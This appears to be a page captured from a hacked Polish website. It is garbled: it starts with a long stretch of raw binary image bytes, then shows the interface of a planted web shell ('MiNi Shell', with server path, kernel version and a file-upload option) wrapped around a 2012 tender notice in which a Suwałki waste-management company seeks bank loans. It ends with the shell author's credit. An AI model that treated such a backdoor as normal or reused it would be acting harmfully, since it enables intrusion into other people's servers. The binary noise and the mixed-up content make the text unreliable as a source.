JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121105/232787-N-2012.html

<p class="kh_header"><b>Suwałki: Udzielenie kredytu długoterminowego inwestycyjnego do kwoty 1.100.000,00 PLN oraz kredytu odnawialnego do kwoty limitu 700.000,00 PLN.</b><br>
<b>Numer ogłoszenia: 232787 - 2012; data zamieszczenia: 05.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Przedsiębiorstwo Gospodarki Odpadami w Suwałkach" Sp. z o.o. , ul. Sejneńska 82, 16-400 Suwałki, woj. podlaskie, tel. 87 5665213, faks 87 5665213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgo.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Komunalna spółka prawa handlowego..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie kredytu długoterminowego inwestycyjnego do kwoty 1.100.000,00 PLN oraz kredytu odnawialnego do kwoty limitu 700.000,00 PLN..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na udzieleniu i obsłudze:
1) złotówkowego kredytu długoterminowego inwestycyjnego do wysokości  
    1.100.000,00 PLN (słownie: jeden milion sto tysięcy złotych) z   
    przeznaczeniem na  finansowanie kwoty netto na realizację inwestycji 
    pn. Dostosowanie instalacji Przedsiębiorstwa Gospodarki Odpadami w
    Suwałkach Sp. z o.o. do wymagań stawianych RIPOK, współfinansowanej 
    przez Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w
    Białymstoku,  zwanego również w treści SIWZ (Kredytem Nr 1) oraz,
2) złotówkowego kredytu odnawialnego do kwoty limitu 700.000,00 PLN  
    (słownie: siedemset tysięcy złotych) z przeznaczeniem na finansowanie
    kwot należnych z tytułu podatku od towarów i usług dotyczącego  
    przedmiotowej inwestycji, które będzie uiszczał Zamawiający, a  
    następnie ubiegał się o ich zwrot od właściwego organu, zwanego również
    w treści SIWZ (Kredytem Nr 2).        
2. Szczegółowe warunki zamówienia:
2.1 Wykonawca postawi do dyspozycji Zamawiającego w rachunku
    kredytowym w banku      kredytującym złotówkowy kredyt długoterminowy
    inwestycyjny do wysokości 1.100.000 zł (Kredyt Nr 1). Kredyt 
    długoterminowy będzie uruchamiany w częściach. Termin uruchomienia
    pierwszej części - do 31.01.2013 roku. Uruchomienie każdej następnej
    części będzie uzależnione od postępu robót i wysokości ponoszonych  
    kosztów przy realizacji inwestycji, na którą kredyt jest przeznaczony.   
    Uruchamianie kredytu będzie następowało w formie bezgotówkowej, na 
    podstawie przedłożonych faktur, w terminie 3 dni przed żądanym   
    terminem uruchomienia części kredytu. 
2.2 Wykonawca uruchomi linię kredytową złotówkowego kredytu   
    odnawialnego do kwoty limitu 700.000,00 zł (Kredyt Nr 2). Termin
    uruchomienia pierwszej części do dnia 31.12.2012 roku. Kredyt będzie
    uruchamiany częściami z możliwością jego wielokrotnego wykorzystania
    w ramach przyznanego limitu kredytowego w formie bezgotówkowej, na
    podstawie przedłożonych faktur w terminie 3 dni przed żądanym  
    terminem uruchomienia części kredytu.
2.3 Okres kredytowania wynosi:
      2.3.1 kredytu Nr 1 - od daty zawarcia umowy do dnia 31 grudnia 2020 r.;
      2.3.2 kredytu Nr 2 - od dnia zawarcia umowy do dnia 31.12.2013r.;
2.4 Okres karencji przy spłacie kredytu Nr 1 do 31 grudnia 2013 r.;
2.5 Prowizja Wykonawcy od udzielonego kredytu Nr 1 i Nr 2 nie może 
    być wyższa niż 0,5%.
2.6 Prowizja Wykonawcy naliczana będzie:
2.6.1Proporcjonalnie od faktycznej kwoty uruchomionego kredytu Nr 1.  
   Opłata prowizji nastąpi poprzez potrącenie przez Bank kwoty prowizji z
   wypłaty części kredytu w wysokości stanowiącej iloczyn stawki prowizji
   określonej w ofercie banku (wg załącznika nr 1 do SIWZ) oraz kwoty   
   wypłaconego kredytu.
2.6.2 Prowizja Wykonawcy od kredytu Nr 2 naliczona będzie jednorazowo     
   od wysokości limitu kredytowego, płatna w ciągu 7 dni od dnia 
   przekazania transzy do dyspozycji.
2.7 Marża Wykonawcy jest stała w okresie umowy w stosunku do kredytu Nr
   1 i Nr 2.
2.8 Wykonawca nie będzie pobierał żadnych innych prowizji i płatzwiązanych
   z realizacją umowy o udzielenie kredytu Nr 1 i Nr 2.
2.9 Wykonawca nie będzie pobierał odsetek i innych opłat od     
   niewykorzystanych części kredytów Nr 1 i Nr 2. 
2.10 Bazowa stopa oprocentowania kredytów Nr 1 i Nr 2 oparta będzie na
   stawce WIBOR 1M powiększonej o marżę Wykonawcy.
2.11 Kwota wykorzystanego kredytu Nr 1 i Nr 2 jest oprocentowana w
   stosunku rocznym według zmiennej stopy procentowej. Stopa procentowa
   równa jest wysokości stawki referencyjnej powiększonej o marżę banku.
   Stawkę referencyjną stanowi stawka WIBOR 1M ustalana dla pierwszego
   okresu obrachunkowego według notowań na 2 dni robocze poprzedzające
   dzień całkowitej lub częściowej wypłaty kredytu, a dla kolejnych okresów
   obrachunkowych na dwa dni robocze poprzedzające rozpoczęcie danego
   okresu obrachunkowego. W przypadku braku notowań stawki WIBOR dla
   drugiego dnia roboczego, do wyliczenia stopy procentowej stosuje się
   odpowiednio notowania z dnia poprzedzającego, w którym było
   prowadzone notowanie stawki WIBOR. W każdym okresie obrachunkowym
   wchodzącym w skład umownego okresu kredytowania stopa 
   oprocentowania kredytu jest stała.
2.12 Naliczanie odsetek od Kredytu Nr 1 i Nr 2 następować będzie w
   okresach  kwartalnych, przy czym pierwsze naliczenie odsetek dokonane  
   będzie za kwartał w którym dokonano wypłat pierwszych części kredytów,  
   kolejne kwartalne  okresy obrachunkowe liczone są od dnia zakończenia
   poprzedniego okresu obrachunkowego, ostatni okres obrachunkowy
   kończy  się w dniu całkowitej spłaty kredytów. Po zakończeniu okresu  
   kwartalnego Wykonawca doręczy Zamawiającemu wyliczenie odsetek do 
   5 dnia następnego miesiąca, a spłata odsetek nastąpi do 15-ego dnia
   miesiąca następującego po upływie okresu kwartalnego. Spłata odsetek  
   będzie następować w ciężar rachunku wg dyspozycji Zamawiającego.
   Odsetki będą naliczane tylko od faktycznie wykorzystanych środków. Do   
   obliczenia kwoty odsetek przyjmuje się rzeczywistą liczbę dni  
   wykorzystania kredytów w stosunku do 365 lub 366 dni w roku.
2.13 Spłata kapitału kredytu Nr 1 następować będzie po upływie karencji:  
   a) w ratach kwartalnych, płatnych w ostatnim dniu miesiąca kończącego 
       kwartał,
   b) pierwsza rata kredytu będzie płatna w dniu 31.03.2014r.,
   c) okres spłaty - 28 rat kwartalnych w okresie  01.01.2014r- 31.12.2020r., 
   d) wysokość rat - 40.000,00 (słownie: czterdzieści tysięcy złotych), z   
       zastrzeżeniem lit.e).,
   e) ostatnia rata kredytu w wysokości 20.000,00  (słownie: dwadzieścia  
       tysięcy złotych). 
2.14 Spłata kapitału Kredytu Nr 2:
   a) wpływ środków pieniężnych na rachunek bankowy z tytułu zwrotu  
       podatku od towarów i usług z właściwego urzędu skarbowego  
       spowoduje spłatę i odnowienie kredytu i możliwość jego wielokrotnego
       wykorzystania w ramach przyznanego limitu kredytowego,
   b) całkowita spłata kredytu nastąpi do dnia 31.12.2013 roku,
   c) ostateczny termin wykorzystania kredytu - do dnia 30.11.2013r.
2.15 Zamawiający zastrzega sobie możliwość wcześniejszej spłaty większej  
     kwoty kapitału Kredytu Nr 1 bez dodatkowych prowizji i opłat. Strony
     ustala nowy harmonogram spłaty kredytu w formie aneksu do umowy.
     Zamawiający jest zobowiązany powiadomić Wykonawcę o planowanej
     wcześniejszej spłacie zadłużenia z wyprzedzeniem na co najmniej 7 dni
     kalendarzowych podając termin i wysokość planowanej spłaty.
2.16 Zamawiający zastrzega sobie prawo do rezygnacji z wykorzystania
     części Kredytu Nr 1 lub Kredytu Nr 2 bez ponoszenia kosztów, a 
     Wykonawca obowiązany jest wyrazić na to zgodę. W przypadku nie
     wykorzystania przez Zamawiającego pełnej kwoty Kredytu Nr 1 lub
     Kredytu Nr 2, wysokość odsetek będzie wynikała z wartości faktycznie  
     wykorzystanego Kredytu Nr 1 lub Kredytu Nr 2. Za niewykorzystanie
     Kredytu Nr 1 lub Kredytu Nr 2 w pełnej wysokości Zamawiający nie  
     będzie ponosił żadnych opłat.
2.17 W przypadku wcześniejszej spłaty Kredytu Nr 1 lub Kredytu Nr 2,  
     Wykonawca nie będzie pobierał dodatkowych opłat i prowizji z tego
     tytułu. W sytuacji, kiedy Kredyt Nr 1 lub Kredyt Nr 2 będzie spłacony
     wcześniej, odsetki liczone będą do dnia spłaty kredytu, a nie do końca  
     okresu umowy (zastrzeżenie możliwości przedterminowej spłaty kredytu
     bez ponoszenia dodatkowych kosztów). O zmianie terminu spłaty 
     kredytu Zamawiający poinformuje w formie pisemnej.
2.18 Za datę wykorzystania Kredytu Nr 1 i Kredytu Nr 2, od której naliczane
     będą odsetki, przyjmuje się datę wypłaty kolejnych części kredytu.
2.19 W przypadku, gdy termin spłaty raty Kredytu Nr 1 przypadnie w dzień
     wolny od pracy, Zamawiający dokona wymaganej spłaty raty kredytu w
     pierwszym dniu roboczym następującym po wyznaczonej dacie spłaty. 
2.20 W przypadku, gdy termin spłaty odsetek Kredytu Nr 1 i Kredytu Nr 2
     przypadnie w dzień wolny od pracy, Zamawiający dokona wymaganej  
     spłaty odsetek w pierwszym dniu roboczym następującym po
     wyznaczonej dacie spłaty.
2.21 Zabezpieczeniem Kredytu Nr 1 będzie:
     a) weksel własny in blanco wraz z deklaracja wekslową, wystawiony
         przez Zamawiającego oraz,
     b) zastaw rejestrowy o wartości ok. 3.000.000 zł ustanowiony na linii do
         segregacji odpadów komunalnych będącej przedmiotem niniejszej
         inwestycji, po przekazaniu powstałego środka trwałego do
         użytkowania wraz z cesją praw z polisy ubezpieczeniowej  dot. środka
         trwałego będącego przedmiotem zastawu rejestrowego.                 
2.22 Zabezpieczeniem Kredytu Nr 2 będzie:
     a) weksel własny in blanco wraz z deklaracją wekslową wystawiony przez 
         Zamawiającego oraz,
     b) pełnomocnictwo do rachunku.
2.23 Uruchomianie kredytów będzie następowało sukcesywnie:  
2.23.1 Kredyt Nr 1  w terminie do 3 dni od daty złożenia wniosku przez
        Zamawiającego o kolejną część, przy czym ostatnia transza wpłynie na
        rachunek bankowy Zamawiającego nie później niż 31 grudnia 2013 r.
2.23.2 Kredyt Nr 2 uruchomiany będzie częściami z możliwością jego 
        wielokrotnego wykorzystania w ramach przyznanego limitu
        kredytowego w terminie 3 dni od daty złożenia wniosku przez  
        Zamawiającego, na podstawie przedłożonych faktur. 
2.24 Realizacja dyspozycji Zamawiającego będzie następowało w formie
     bezgotówkowej na rachunki kredytowe Zamawiajacego otworzone przez  
     Wykonawcę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2020.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca zapewni jako część swojej oferty wadium w wysokości: 11.000,00 zł (słownie: jedenaście tysięcy złotych) na całość zamówienia.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy
    oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest
    zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.
    5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji  
    Rozwoju Przedsiębiorczości (tj.Dz. U. z 2007 r Nr 42 poz.275).
    Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek 
    bankowy Przedsiębiorstwa Gospodarki Odpadami w Suwałkach Sp. z o.o. 
    Pekao S.A. II.O w Suwałkach nr  57 1240 3363 1111 0010 4404 5992  w
    terminie do dnia    26.11.2012 r. do godz. 10:00 (decyduje data wpływu 
    środków na rachunek zamawiającego). Kserokopię dowodu wniesienia
    wadium w pieniądzu należy złożyć w ofercie.
    Wadium w pozostałych formach - oryginały - składa
    się w  Przedsiębiorstwie Gospodarki Odpadami w Suwałkach Sp. z o.o.   
    ul. Buczka 150A, 16-400 Suwałki w pokoju Nr (Kadry)  przed upływem  
    terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie:
a) oświadczenie w trybie art. 22 ust.1, pkt.1 ustawy Prawo zamówień
    publicznych,
b) zezwolenie Komisji Nadzoru Finansowego na rozpoczęcie działalności
    bankowej, o którym mowa w art. 36 ustawy z dnia 29 sierpnia 1997r.  
    Prawo bankowe (Dz.U. z 2002r. Nr 72, poz. 665 z późn. zm.), a w
    przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe inny
    dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w
    życie stawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art. 22 ust.1, pkt. 2 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art. 22 ust.1, pkt. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art. 22 ust.1, pkt. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeśli Wykonawca przedłoży w ofercie oświadczenie w trybie art. 22 ust.1, pkt. 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgo.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Odpadami w Suwałkach Sp. z o.o. ul.Buczka 150A, 16-400 Suwałki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2012 godzina 10:00, miejsce: Przedsiębiorstwo Gospodarki Odpadami w Suwałkach Sp. z o.o. ul.Buczka 150A, 16-400 Suwałki, pok. Kadry.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com